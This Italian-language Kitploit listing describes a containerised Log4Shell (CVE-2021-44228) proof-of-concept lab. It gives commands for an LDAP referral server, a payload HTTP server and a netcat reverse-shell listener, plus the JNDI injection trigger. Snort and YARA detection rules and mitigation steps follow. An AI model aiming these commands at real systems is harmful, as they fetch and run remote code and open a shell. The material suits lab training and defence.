Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4Shell-PoC — **Log4Shell PoC è un ambiente di sfruttamento ad alta fedeltà progettato per replicare la vulnerabilità CVE-2021-44228.** Fornisce un sandbox containerizzato per dimostrare l'iniezione JNDI, il reindirizzamento di referral LDAP/RMI e l'esecuzione remota di codice (RCE) tramite la libreria Log4j 2. | Kitploit
Strumenti/GitHubGitHub/josemariamicoli/log4shell-poc
Analisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebCommand and ControlApprendimento e FormazioneRisposta agli IncidentiSviluppo PayloadLab e Pratica
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

Vedi Repository
127 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

**Log4Shell PoC è un ambiente di sfruttamento ad alta fedeltà progettato per replicare la vulnerabilità CVE-2021-44228.** Fornisce un sandbox containerizzato per dimostrare l'iniezione JNDI, il reindirizzamento di referral LDAP/RMI e l'esecuzione remota di codice (RCE) tramite la libreria Log4j 2.

Condividi

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) LAB PoC
          [ PROVA DI CONCETTO & SFRUTTAMENTO JNDI ]

Log4Shell PoC è un ambiente di sfruttamento ad alta fedeltà progettato per replicare la vulnerabilità CVE-2021-44228. Fornisce una sandbox containerizzata per dimostrare l'iniezione JNDI, il reindirizzamento referral LDAP/RMI e l'esecuzione remota di codice (RCE) tramite la libreria Log4j 2.


⚠️ AVVISO

Solo per scopi educativi e test di sicurezza autorizzati.

L'uso di questa Prova di Concetto per attaccare bersagli senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per perdita di dati, danni al sistema, conseguenze legali o uso improprio causato da questo programma. Utilizzando questo software, accetti di operare entro i limiti legali della tua giurisdizione.



Sezione 2: Capacità e struttura del progetto

🚀 Capacità del PoC

  • Iniezione JNDI: Punto di ingresso vulnerabile Log4j 2.14.1.
  • Server referral LDAP: Reindirizzamento LDAP dannoso tramite Marshalsec.
  • Caricamento remoto di classi: Consegna HTTP di bytecode Java compilato.
  • Payload multi-stadio: Esecuzione di reverse shell nativa in Java.
  • Test di elusione: Bypass di TrustURLCodebase e FormatMsgNoLookups.

🛠 Struttura del PoC

🛰 Infrastruttura dannosa (Attaccante)

Il lato dell'attaccante è composto da tre canali distinti per facilitare il PoC.

  • Redirector LDAP (Porta 1389): Basato su Marshalsec, reindirizza la richiesta JNDI della vittima all'exploit ospitato.
  • Server payload HTTP (Porta 8888): Ospita il bytecode Exploit.class che la vittima deve scaricare ed eseguire.
  • Listener NC (Porta 9001): Il punto di chiamata finale per la reverse shell.

💻 Istanza vulnerabile (Vittima)

Un ambiente Dockerizzato OpenJDK 8 che esegue un'implementazione vulnerabile di Log4j.

  • Log4j v2.14.1: La versione della libreria bersaglio.
  • VulnerableLog.java: Una semplice applicazione Java che registra l'input fornito dall'utente senza sanificazione.


Sezione 3: Istruzioni di installazione ed esecuzione

⚙️ Installazione ed esecuzione

1. Configurazione dell'attaccante (Arch Linux)

Tab 1: Server di referral LDAP

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

Tab 2: Consegna del payload HTTP

root@kitploit:~
# Avvia il server Python nella directory contenente Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

Tab 3: Listener Netcat

root@kitploit:~
nc -lvnp 9001

2. Esecuzione della vittima

Tab 4: Avvia il container vulnerabile

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

All'interno del container: Attiva il PoC

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



Sezione 4: Rilevamento e mitigazione

🔍 Rilevamento e monitoraggio difensivo

1. Rilevamento di rete (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. Rilevamento basato su log (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Rileva stringhe di lookup JNDI nei log utilizzati nel PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 Matrice di risposta agli incidenti (IR)

FaseTecnicaAllarme attivato?MITRE ATT&CK
Accesso inizialeSfruttamento app pubblica[ ]T1190
EsecuzioneInterprete comandi e script[ ]T1059
Comando e controlloProtocollo a livello applicativo (LDAP)[ ]T1071.003
EsfiltrazioneProtocollo non a livello applicativo[ ]T1048

🔒 Mitigazione e rafforzamento

  1. Aggiornamento: Aggiornare a Log4j 2.17.1 o superiore.
  2. Flag JVM: Impostare -Dlog4j2.formatMsgNoLookups=true per disabilitare i lookup.
  3. Rimozione classe: Rimuovere manualmente JndiLookup.class dal JAR log4j-core.

🔒 Regole di ingaggio

  1. Isolamento: Codificare a livello di codice gli IP target al bridge Docker interno (172.17.0.0/16).
  2. Rete: Assicurarsi esclusivamente networking Host-Only/Internal VM.
  3. Sicurezza C2: Non esporre i server Python o LDAP alla rete Internet pubblica.

Scarica lo strumento